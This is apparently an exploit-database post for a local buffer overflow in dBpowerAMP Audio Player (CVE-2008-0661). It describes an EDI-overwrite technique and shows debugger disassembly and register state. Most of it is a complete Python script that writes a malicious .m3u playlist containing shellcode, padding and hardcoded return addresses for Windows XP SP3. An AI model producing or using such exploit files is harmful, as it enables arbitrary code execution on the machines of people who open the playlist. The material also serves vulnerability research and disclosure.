dBpowerAMP Audio Player Buffer Overflow

                							

                # Exploit Title: dbpoweramp local buffer overflow, a different approch
# Date: 31/8/2010
# Author: 41.w4r10r and FB1H2S
# Software Link: http://usfiles.brothersoft.com/mp3_audio/players/dBpowerAMP-r2.exe
# Version: [app version]
# Tested on: Microsoft XP service pack 3
# CVE : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0661

The local exploit which was published http://www.exploit-db.com/exploits/5069 http://www.exploit-db.com/exploits/5067, the software had an overflow, 
which could be exploited if passed in with a 255 char string, it would overwrite the EIP, but if the string goes above 255 the EIP wont be 
overwritten insted the EDI would be. The published exploit uses a direct EIP overwrite using a 255 char ( shellcode + junk ).
But it is possible to exploit the appplication with a 255+ char in the follwoing way.

1) 270 chars overwrite the EDI and EIP remains intact
2) EDI Destination index points to our junk now, and we got controll over EDI
3) EDI points to a data, so overwrite it to point to EDX which also hold our junk, a jump EDX will work
4) Now EIP will be overwritten, so on second step make EIP point to EDI and we could run our arbitary code.

################################################################################################
At the time of 255+ char the assembled code gives idea whats happening
################################################################################################
00422BD0  /$ 56             PUSH ESI
00422BD1  |. 57             PUSH EDI
00422BD2  |. 8B7C24 0C      MOV EDI,DWORD PTR SS:[ESP+C]
00422BD6  |. 83C9 FF        OR ECX,FFFFFFFF
00422BD9  |. 33C0           XOR EAX,EAX
00422BDB  |. 6A 5C          PUSH 5C                                  ; /c = 5C  ('\')
00422BDD  |. F2:AE          REPNE SCAS BYTE PTR ES:[EDI]             ; | Repeat and 
00422BDF  |. 8B4424 14      MOV EAX,DWORD PTR SS:[ESP+14]            ; |
00422BE3  |. F7D1           NOT ECX                                  ; |
00422BE5  |. 2BF9           SUB EDI,ECX                              ; |
00422BE7  |. 50             PUSH EAX                                 ; |s
00422BE8  |. 8BD1           MOV EDX,ECX                              ; |
00422BEA  |. 8BF7           MOV ESI,EDI                              ; |
00422BEC  |. 8BF8           MOV EDI,EAX                              ; |
00422BEE  |. C1E9 02        SHR ECX,2                                ; |
00422BF1  |. F3:A5          REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>; |
00422BF3  |. 8BCA           MOV ECX,EDX                              ; |
00422BF5  |. 83E1 03        AND ECX,3                                ; |
00422BF8  |. F3:A4          REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[>; |
00422BFA  |. FF15 E4A14200  CALL DWORD PTR DS:[<&MSVCRT.strrchr>]    ; \strrchr
00422C00  |. 83C4 08        ADD ESP,8

#The registers at the time of the oveflow

EAX 00000000
ECX FFFFFFFF
EDX 00B9ECD8 ASCII "http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+[Our Junk]
EBX 00B9F110 ASCII "http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+[Our Junk]
ESP 00B9ECB4
EBP 77C3F931 msvcrt.sprintf
ESI 00B9F285
EDI 41414141
EIP 00422BDD Amp.00422BDD
C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 1  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFDC000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty -??? FFFF 00000000 7C90E920
ST1 empty +UNORM 0060 00140000 00000000
ST2 empty 0.0000000076189029870e-4933
ST3 empty 0.0208724709907450280e-4933
ST4 empty +UNORM 770A 0012F850 00000000
ST5 empty 0.0208724786043381110e-4933
ST6 empty +UNORM 2CCE 0012F588 00890000
ST7 empty -??? FFFF 7C919318 7C90E920
               3 2 1 0      E S P U O Z D I
FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1

##############################################################################################################################
#!/usr/bin/python
#
#And all greets to Garage Hackers Members.
#http://www.garage4hackers.com
#And shouts to ICW, Andhra Hackers members
#
#and our Brothers:-
#B0Nd,Eberly,Wipu,beenu,w4ri0r,empty,neo,Rohith,Sids786,SmartKD,Tia,h@xor,r5scal,Yash,Secure_IT, Atul, Vinnu and all others. 
#
#
#
#
shellcode= ("\x90\x90\xcc\x90\x90\x90\x90\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1"
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30"
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" 
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" 
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" 
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" 
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" 
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" 
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" 
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05"
"\x7f\xe8\x7b\xca\x90\x90\x90\x90\x90\x90")
leng=260-len(shellcode)
junk = shellcode+"D"*leng
print len(junk)
junk=junk+"\xF0\xB0\x80\x7C"+"DCBA\xD8\xEC\xB9\x00"
#######################################################################################################################
#Make EDI point to EDX using a jump EDX, DCBA\xD8\xEC\xB9\x00 from application
#now we ill get controll over EIP Now point EIP point to EDI [ #jmp edi \xF0\xB0\x80\x7C from kernal 32.dll Microsoft Service pack 3 ] 
#######################################################################################################################
filename = "garage4hackers.m3u";
file = open(filename,"w")   
file.writelines(junk)
file.close()
print "File Is created"
print "Press Any Key To Continue........."
raw_input()
<p>